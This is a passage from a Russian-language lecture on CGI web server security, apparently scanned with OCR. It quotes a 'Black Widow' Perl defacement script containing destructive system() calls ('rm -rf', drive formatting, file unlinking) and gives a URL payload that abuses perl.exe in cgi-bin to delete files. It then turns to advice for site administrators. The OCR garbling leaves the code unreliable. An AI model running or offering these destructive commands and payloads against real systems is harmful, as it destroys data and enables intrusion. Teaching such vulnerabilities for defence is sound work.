Лекция: Выводится некий текст для проверки и работы скрипта

print <EOF: Content-Type: text/plain

The WWW Black Widow was here. EOF

# Ну а здесь уже можно написать что угодно — от простого # сообщения

администратору о найденной дырке, до чего-нибудь # типа

и systeiTiC'rm -rf * /*"): ff systemC'tormat a:"); ff

systemC'ls -IR"); # systemC'dir"): # unlink <* *.*

/*>;

print «If I were nasty, you'd bespiderfoodbynow.\n»; print "\n\n\t--the black

widow\n";

_-END__

Если под рукой нет Peri, можно попробовать просто дать команду типа www.victim.com/cgi-

bin/perl.exe?&-e+unlink+%3C*%3E.

Аналогичные проблемы возникают при реализации РНР в качестве cgi-скрипта и его размещении в каталоге

Cgi-bin.

Безопасность CGI-приложений

Устанавливая последнюю версию Web-сервера, мы можем быть уверены хотя бы в том, что она не содержит

Очевидных ошибок, опубликованных по всей Сети пару лет тому назад. На появление новых ошибок произво-

Дители реагируют достаточно быстро, а задача администратора сводится

К тому, чтобы быть в курсе происходящего. С CGI-приложениями ситуация несколько иная — на сей раз в роли

Разработчика зачастую выступают владельцы сайтов, которые должны сами заботиться о безопасности

Приложений. Не стоит особо доверять и готовым скриптам, так как огромное количество ошибок

Обнаруживается именно в примерах, поставляемых вместе с Web-серверами, а также во многих популярных